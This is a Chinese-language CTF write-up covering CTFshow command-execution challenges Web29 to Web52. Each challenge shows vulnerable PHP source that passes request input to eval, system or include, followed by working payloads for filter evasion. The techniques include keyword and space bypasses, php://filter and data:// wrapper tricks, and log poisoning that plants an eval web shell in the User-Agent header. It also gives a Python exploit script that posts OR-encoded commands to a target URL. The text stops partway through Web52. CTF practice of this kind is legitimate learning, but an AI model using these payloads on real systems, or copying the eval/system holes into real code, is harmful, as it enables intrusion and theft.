【CTFshow命令执行 Web29-52】2021.8.17 CTFshow刷题

本文最后更新于:2021年8月18日下午1点39分

Web29

打开题目,页面如下:

image-20210817105706795

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

eval函数:把字符串 code 作为PHP代码执行。

image-20210817105958180

既然eval函数是执行PHP代码,那么先传payload,看看当前目录下有哪些文件。

1
http://c73de11b-5401-45ca-8d51-4c0bd417145b.challenge.ctf.show:8080/?c=system('ls');

image-20210817110149767

接着我们读取flag.php文件,但是flag.php文件中,flag被正则过滤了。因此我们可以尝试绕过flag这个关键字,读取flag。

1
?c=system("cat fla''g.php");
1
?c=system("cat fla\g.php");

也可以使用反引号命令内敛执行的特性:

1
?c=system("cat `ls`");

也可以使用通配符绕过:

1
?c=system("cat *");
1
?c=system("cat ????.php");

官方payload:

1
?c=echo `nl fl''ag.php`;

其中nlLinux命令,nl命令与cat命令类似,不过nl命令会将输出的内容自动加上行号。

image-20210817112918680

image-20210817112934407

Web30

题目源代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

过滤了flag,system,php这三个关键字

系统命令执行除了system,还有exec、passthru、shell_exec。

这里直接给出payload:

1
?c=passthru("cat ????.???");

当然,也可以使用exec函数:

1
?c=echo exec("cat ????.???");

注意:exec函数只能返回命令执行完的最后一行,并且需要使用echo进行输出,这题运气也比较好,flag就在最后一行。

image-20210817115124946

也可以使用shell_exec函数:

1
?c=echo shell_exec("cat ????.???");

官方payload:

1
?c=echo `nl fl''ag.p''hp`;

Web31

代码如下:

image-20210817115733538

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

过滤了flag,system,php,cat,sort,shell,点号,空格,单引号

PHP绕过空格可以使用%09代替

1
?c=echo(`nl%09*`);

也可以使用more命令:

1
?c=passthru("more%09f*");

过滤了cat命令,也可以使用tac命令:

1
?c=passthru("tac%09f*");

当然也可以想办法多POST一个变量上去,然后蚁剑链接等等

1
2
?c=passthru($_POST[a]);
POSTDATA: a=cat flag.php

官方给的hint:

1
show_source(next(array_reverse(scandir(pos(localeconv())))));

这个hint大致是参考GXYCTF2019无参数RCE的题目:【PHP无参数RCE】GXYCTF2019 禁止套娃 | Mocha–Just a novice (xiinnn.com)

1
2
?c=show_source(array_rand(array_flip(scandir(current(localeconv())))));
#多刷新几次就能刷新出来

Web32

打开题目:

image-20210817123722932

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

过滤了flag、system、php、cat、sort、shell、点号、空格、单引号、反引号、echo、分号、左括号

这里的话,因为eval能执行PHP代码,所以我们执行include,进行文件包含。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
得到:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7Nzc0NDkxYTQtN2JlZi00ODhlLWE3M2QtZDQ4N2M1ZmZkNGIxfSI7DQo=
base64解码后:
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$flag="ctfshow{774491a4-7bef-488e-a73d-d487c5ffd4b1}";

官方Hint:

1
c=$nice=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

Web33

打开题目:

image-20210817125415887

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

过滤了:flag、system、php、cat、sort、shell、点号、空格、单引号、反引号、echo、分号、左括号、双引号

和上一题payload一样:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
得到:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7N2EzMzE3ODQtOWEyYS00Mzk5LTg3MDgtNDE5ZjlhZWMxN2Y5fSI7DQo=
解码后:
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$flag="ctfshow{7a331784-9a2a-4399-8708-419f9aec17f9}";

官方hint:

1
c=?><?=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

Web34

打开题目:

image-20210817130507029

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

过滤了flag、system、php、cat、sort、shell、点号、空格、单引号、反引号、echo、分号、左括号、冒号、双引号

和前两题payload一样:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
得到:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7MzRmMDJhZWEtZTQwYi00YTA5LTliZGUtYjQyYjBiMTZhNWFlfSI7DQo=
解码后:
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$flag="ctfshow{34f02aea-e40b-4a09-9bde-b42b0b16a5ae}";

官方Hint:

1
c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

Web35

打开题目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

过滤了flag、system、php、cat、sort、shell、点号、空格、单引号、反引号、echo、分号、左括号、冒号、双引号、小于号、等号

和前三题payload一样:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
得到:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDM6Mzc6MTENCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7YTM1MzM1OGEtN2IzMC00YWNlLWFmODAtNzZhYmUxZDE4MjZmfSI7
解码后:
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 03:37:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$flag="ctfshow{a353358a-7b30-4ace-af80-76abe1d1826f}";

官方hint:

1
c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

Web36

打开题目:

image-20210817131132354

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

过滤了flag、system、php、cat、sort、shell、点号、空格、单引号、反引号、echo、分号、左括号、冒号、双引号、小于号、等号、斜杠、0-9的数字。

和前四题一样的payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
得到:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDM6Mzc6MTENCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7NDNkZTFhNDQtZGQyMy00OWVlLWI1OTMtZjFhMTZiZWMxZDk1fSI7
解码后:
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 03:37:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$flag="ctfshow{43de1a44-dd23-49ee-b593-f1a16bec1d95}";

官方Hint:

1
c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

Web37

打开题目:

image-20210817140415259

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;

}

}else{
highlight_file(__FILE__);
}

过滤了flag,包含变量c

第一种方法是使用data协议,进行命令执行:

1
?c=data://text/plain,<?php system("cat ****.php");?>
1
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

第二种方法是进行日志注入:

1
2
3
4
5
6
7
8
GET / HTTP/1.1
Host: e6a72e9f-9d8b-4cde-9379-114f9c718713.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) <?php @eval($_POST['a']);?>Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

然后用蚁剑连接:

1
2
?c=/var/log/nginx/access.log
密码为a

官方hint:

1
2
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
查看源代码 或者通过包含日志文件拿shell

Web38

打开题目:

image-20210817145005598

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;

}

}else{
highlight_file(__FILE__);
}

和上一题一样。

第一种方法是data协议,用base64绕过过滤字

1
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

第二种方法是日志注入

官方Hint:

1
2
3
nginx的日志文件/var/log/nginx/access.log
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
查看源代码 或者通过包含日志文件拿shell

Web39

打开题目:

image-20210817145838087

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}

}else{
highlight_file(__FILE__);
}

data协议的payload:

1
2
3
?c=data://text/plain,<?php system($_POST[a]);?>
POSTDATA:
a=cat%20flag.php

注意,这个题目不能用base64的,否则无法执行postdata。

官方Hint:

1
data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用

Web40

打开题目:

image-20210817151831425

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:03:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/


if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

过滤了一大堆字符,其实和GXYCTF2019 禁止套娃的题目一样,要求我们无参数RCE。

【PHP无参数RCE】GXYCTF2019 禁止套娃 | Mocha–Just a novice (xiinnn.com)

先看看目录下有哪些文件:

1
?c=print_r(scandir(current(localeconv())));

image-20210817152623926

flag.php位于倒数第二项,那就先将数组逆序排序,然后用next读取flag.php

1
?c=highlight_file(next(array_reverse(scandir(current(localeconv())))));

image-20210817152801446

除了用这个办法,也可以使用数组随机排序的办法(靠阳寿,多刷新几次

1
?c=readfile(array_rand(array_flip(scandir(current(localeconv())))));

还有一个办法就是通过cookie获得参数进行命令执行,具体参考之前的那篇文章:

【PHP无参数RCE】GXYCTF2019 禁止套娃 | Mocha–Just a novice (xiinnn.com)

官方Hint:

1
2
3
show_source(next(array_reverse(scandir(pos(localeconv()))))); GXYCTF的禁止套娃 通过cookie获得参数进行命令执行
c=session_start();system(session_id());
passid=ls

Web41

打开题目:

image-20210817153145902

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date: 2020-09-05 20:31:22
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show

*/

if(isset($_POST['c'])){
$c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
eval("echo($c);");
}
}else{
highlight_file(__FILE__);
}
?>

相比前一题,还过滤了字母,不过竖线没有被过滤,意味着我们可以使用或运算,来达到rce的目的。

这边直接上脚本了

首先是一个PHP脚本:这个PHP脚本遍历了ascii字符,然后双重循环进行枚举,如果两个值进行或运算之后,能成为一个可见字符,就将其保存到文件rce_or.txt中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
$myfile = fopen("rce_or.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) {
for ($j=0; $j <256 ; $j++) {

if($i<16){
$hex_i='0'.dechex($i);
}
else{
$hex_i=dechex($i);
}
if($j<16){
$hex_j='0'.dechex($j);
}
else{
$hex_j=dechex($j);
}
$preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i';
if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
echo "";
}

else{
$a='%'.$hex_i;
$b='%'.$hex_j;
$c=(urldecode($a)|urldecode($b));
if (ord($c)>=32&ord($c)<=126) {
$contents=$contents.$c." ".$a." ".$b."\n";
}
}

}
}
fwrite($myfile,$contents);
fclose($myfile);

上方PHP脚本执行完之后,在相同目录下就会生成一个rce_or.txt

接着我们使用Python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# -*- coding: utf-8 -*-
import requests
import urllib
from sys import *
import os

if(len(argv)!=2):
print("="*50)
print('USER:python exp.py <url>')
print("eg: python exp.py http://ctf.show/")
print("="*50)
exit(0)
url=argv[1]
def action(arg):
s1=""
s2=""
for i in arg:
f=open("rce_or.txt","r")
while True:
t=f.readline()
if t=="":
break
if t[0]==i:
#print(i)
s1+=t[2:5]
s2+=t[6:9]
break
f.close()
output="(\""+s1+"\"|\""+s2+"\")"
return(output)

while True:
param=action(input("\n[+] your function:") )+action(input("[+] your command:"))
data={
'c':urllib.parse.unquote(param)
}
r=requests.post(url,data=data)
print("\n[*] result:\n"+r.text)

注意使用Python3执行!

image-20210817185905144

官方Hint:

1
https://blog.csdn.net/miuzzx/article/details/108569080

Web42

打开题目:

image-20210817190116994

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
$c=$_GET['c'];
system($c." >/dev/null 2>&1");
}else{
highlight_file(__FILE__);
}

对c进行传参:

1
?c=ls;

得到两个文件

image-20210817190300734

读取flag.php,即可拿到flag

1
?c=cat flag.php;

官方Hint:

1
cat flag.php%0a 查看源代码

Web43

打开题目:

image-20210817190519813

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:32:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}

分号和cat被过滤了,那就用%0a代替分号,tac代替cat

payload如下:

1
?c=tac%20flag.php%0a

或者用more代替:

1
?c=more%20flag.php%0a

或者用nl代替:

1
?c=nl%20flag.php%0a

官方Hint:

1
nl flag.php%0a 查看源代码

Web44

打开题目:

image-20210817195720082

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:32:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|cat|flag/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}

比上一题多过滤一个flag

payload如下:

1
?c=tac%20****.php%0a
1
?c=more%20****.php%0a
1
?c=nl%20****.php%0a

官方Hint:

1
nl fla*.php%0a 查看源代码

Web45

打开题目:

image-20210817200623741

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:35:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| /i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}

比上一道题多过滤了一个空格,绕过空格可以有以下几种方法:

  • ${IFS}
  • ${IFS}$1
  • $IFS$1
  • <>
  • <
  • %09(需要PHP环境)

因此payload可以是

1
?c=tac${IFS}fla*.php%0a
1
?c=tac${IFS}$1fla*.php%0a

或者将tac替换成nl、more、tail、sort、less、head等等

官方Hint:

1
echo$IFS`tac$IFS*`%0A

Web46

打开题目:

image-20210817201247658

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:50:19
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}

过滤了分号、flag、空格、数字、$、星号

payload如下:

1
?c=tac<>fla\g.php||
1
?c=nl<fla''g.php||

等等。。。。自行排列组合即可!

官方Hint:

1
nl<fla''g.php||

Web47

打开题目:

image-20210817202021225

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:59:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}

正则过滤了一大堆

直接上payload

1
?c=nl<fla''g.php||
1
?c=tac<>fla''g.php||

官方Hint:

1
nl<fla''g.php||

Web48

打开题目:

image-20210817202435938

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:06:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}

比上一题还多过滤了一大堆。

直接上payload:

1
?c=tac<>fla''g.php||
1
?c=nl<fla\g.php||

官方Hint:

1
nl<fla''g.php||

Web49

打开题目:

image-20210817202705332

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:22:43
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}

和上一题payload一样:

1
?c=tac<>fla%27%27g.php%0a
1
?c=nl<fla\g.php%0a

官方Hint:

1
nl<fla''g.php||

Web50

打开题目:

image-20210817202916058

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}

和前几题一样:

1
?c=tac<fla''g.php||
1
?c=nl<>fla\g.php||

官方Hint:

1
nl<fla''g.php||

Web51

打开题目:

image-20210817203100798

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:42:52
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}

还是一样。。。。

1
?c=nl<fla''g.php||
1
?c=nl<>fla\g.php||

官方Hint:

1
nl<fla''g.php||

Web52

打开题目:

image-20210817203353365

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:50:30
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
$c=$_GET['c'];
